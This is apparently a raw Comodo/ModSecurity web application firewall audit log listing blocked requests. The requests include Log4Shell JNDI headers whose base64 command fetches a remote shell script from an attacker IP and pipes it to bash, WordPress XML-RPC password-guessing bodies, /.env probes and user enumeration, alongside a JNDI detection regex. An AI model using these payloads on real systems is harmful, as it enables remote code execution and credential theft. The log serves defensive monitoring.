3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748086442611318 2103 (- - -) Stopwatch2: 1748086442611318 2103; combined=975, p1=340, p2=609, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4a5bb42-Z-- --29d7f97b-A-- [24/May/2025:18:34:25 +0700] aDGuweunkxaVeh4NwhbXdwAAAFY 103.236.140.4 36702 103.236.140.4 8181 --29d7f97b-B-- GET / HTTP/1.0 Referer: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} Host: 103.236.140.4 Cookie: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} X-Real-IP: 161.97.111.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} X-Forwarded-Proto: http Connection: close Authorization: Oauth ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} Accept: */* X-Api-Version: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} User-Agent: ${jndi:ldap:/161.97.111.76:1389/Basic/Command/Base64/KGN1cmwgLXMgaHR0cDovMTYxLjk3LjExMS43Ni9lZ2V0LnNofHx3Z2V0IC1xIC1PLSBodHRwOi8xNjEuOTcuMTExLjc2L2VnZXQuc2gpfGJhc2g=} --29d7f97b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29d7f97b-E-- --29d7f97b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748086465117203 4106 (- - -) Stopwatch2: 1748086465117203 4106; combined=3085, p1=409, p2=2650, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29d7f97b-Z-- --069bf767-A-- [24/May/2025:18:48:08 +0700] aDGx-DvI5DIWBJ2mFG5Q2AAAANg 103.236.140.4 38840 103.236.140.4 8181 --069bf767-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.231.115.89 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --069bf767-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinantix-admin1122 --069bf767-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --069bf767-E-- --069bf767-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.231.115.89 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748087288958917 5668 (- - -) Stopwatch2: 1748087288958917 5668; combined=3912, p1=482, p2=3285, p3=0, p4=0, p5=87, sr=99, sw=58, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --069bf767-Z-- --f9e79602-A-- [24/May/2025:18:54:59 +0700] aDGzkzvI5DIWBJ2mFG5TZwAAANQ 103.236.140.4 46548 103.236.140.4 8181 --f9e79602-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.231.115.89 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f9e79602-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinadmin_antix99 --f9e79602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9e79602-E-- --f9e79602-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.231.115.89 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748087699864000 5656 (- - -) Stopwatch2: 1748087699864000 5656; combined=4227, p1=508, p2=3544, p3=0, p4=0, p5=104, sr=91, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9e79602-Z-- --11028913-A-- [24/May/2025:19:11:46 +0700] aDG3guO2UzDOKMmK0i6qqwAAAA8 103.236.140.4 54350 103.236.140.4 8181 --11028913-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.120.168 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.120.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11028913-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11028913-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748088706863647 882 (- - -) Stopwatch2: 1748088706863647 882; combined=346, p1=305, p2=0, p3=0, p4=0, p5=41, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11028913-Z-- --16ef8627-A-- [24/May/2025:19:17:12 +0700] aDG4yOO2UzDOKMmK0i6rYAAAAAw 103.236.140.4 58782 103.236.140.4 8181 --16ef8627-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --16ef8627-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16ef8627-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748089032900725 13472 (- - -) Stopwatch2: 1748089032900725 13472; combined=25881, p1=243, p2=0, p3=0, p4=0, p5=12840, sr=68, sw=0, l=0, gc=12798 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16ef8627-Z-- --3657023c-A-- [24/May/2025:19:25:24 +0700] aDG6tOunkxaVeh4NwhbgUQAAAEw 103.236.140.4 37942 103.236.140.4 8181 --3657023c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.72.192.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.72.192.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3657023c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3657023c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748089524282749 2628 (- - -) Stopwatch2: 1748089524282749 2628; combined=1201, p1=413, p2=760, p3=0, p4=0, p5=27, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3657023c-Z-- --e213332b-A-- [24/May/2025:19:28:53 +0700] aDG7hfmzt4abyoi_U9kMCAAAAIs 103.236.140.4 44450 103.236.140.4 8181 --e213332b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 125.212.243.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 125.212.243.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e213332b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e213332b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748089733135942 3231 (- - -) Stopwatch2: 1748089733135942 3231; combined=1452, p1=512, p2=905, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e213332b-Z-- --80e46802-A-- [24/May/2025:19:49:49 +0700] aDHAbeunkxaVeh4NwhbluwAAAEc 103.236.140.4 56844 103.236.140.4 8181 --80e46802-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 185.18.232.22 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 185.18.232.22 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --80e46802-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin!@#$%^&*() --80e46802-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e46802-E-- --80e46802-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748090989070091 6417 (- - -) Stopwatch2: 1748090989070091 6417; combined=4753, p1=519, p2=3998, p3=34, p4=36, p5=100, sr=89, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e46802-Z-- --a222a53a-A-- [24/May/2025:19:52:21 +0700] aDHBBeunkxaVeh4NwhblyAAAAE4 103.236.140.4 56926 103.236.140.4 8181 --a222a53a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 173.252.167.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 173.252.167.130 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a222a53a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihin&solihin& --a222a53a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a222a53a-E-- --a222a53a-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748091141975385 6227 (- - -) Stopwatch2: 1748091141975385 6227; combined=4744, p1=500, p2=3986, p3=33, p4=36, p5=127, sr=94, sw=62, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a222a53a-Z-- --3608241c-A-- [24/May/2025:19:53:51 +0700] aDHBX-unkxaVeh4NwhblzwAAAFY 103.236.140.4 57008 103.236.140.4 8181 --3608241c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.144.127.41 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.144.127.41 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --3608241c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihin0solihin0 --3608241c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3608241c-E-- --3608241c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 162.144.127.41 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748091231683078 5809 (- - -) Stopwatch2: 1748091231683078 5809; combined=4230, p1=516, p2=3550, p3=0, p4=0, p5=97, sr=85, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3608241c-Z-- --25aec27f-A-- [24/May/2025:19:54:22 +0700] aDHBfuunkxaVeh4Nwhbl0gAAAFg 103.236.140.4 57030 103.236.140.4 8181 --25aec27f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.142.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.142.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --25aec27f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25aec27f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748091262173702 2796 (- - -) Stopwatch2: 1748091262173702 2796; combined=1324, p1=419, p2=876, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25aec27f-Z-- --479adf12-A-- [24/May/2025:20:12:59 +0700] aDHF2-O2UzDOKMmK0i6v_QAAAAk 103.236.140.4 57758 103.236.140.4 8181 --479adf12-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.225.75.246 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --479adf12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479adf12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748092379041345 708 (- - -) Stopwatch2: 1748092379041345 708; combined=267, p1=237, p2=0, p3=0, p4=0, p5=30, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479adf12-Z-- --66901401-A-- [24/May/2025:20:38:06 +0700] aDHLvuO2UzDOKMmK0i6wiAAAAAk 103.236.140.4 58902 103.236.140.4 8181 --66901401-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.227.39.235 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.227.39.235 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --66901401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66901401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748093886975669 763 (- - -) Stopwatch2: 1748093886975669 763; combined=313, p1=282, p2=0, p3=0, p4=0, p5=31, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66901401-Z-- --30654116-A-- [24/May/2025:20:38:20 +0700] aDHLzOO2UzDOKMmK0i6wkAAAAAw 103.236.140.4 58932 103.236.140.4 8181 --30654116-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --30654116-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin148 --30654116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30654116-E-- --30654116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 50.6.205.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748093900731365 4232 (- - -) Stopwatch2: 1748093900731365 4232; combined=2858, p1=362, p2=2388, p3=0, p4=0, p5=64, sr=56, sw=44, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30654116-Z-- --74483501-A-- [24/May/2025:20:38:47 +0700] aDHL5-O2UzDOKMmK0i6wlwAAAA0 103.236.140.4 58954 103.236.140.4 8181 --74483501-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 67.205.42.207 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 67.205.42.207 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --74483501-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin1478 --74483501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74483501-E-- --74483501-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 67.205.42.207 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748093927874924 5881 (- - -) Stopwatch2: 1748093927874924 5881; combined=4188, p1=557, p2=3464, p3=0, p4=0, p5=99, sr=132, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74483501-Z-- --ee048637-A-- [24/May/2025:20:43:22 +0700] aDHM-uO2UzDOKMmK0i6wuQAAABI 103.236.140.4 59146 103.236.140.4 8181 --ee048637-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 50.6.205.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 50.6.205.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ee048637-C-- system.multicallmethodNamewp.getUsersBlogsparamssolihinsolihin1*# --ee048637-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee048637-E-- --ee048637-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
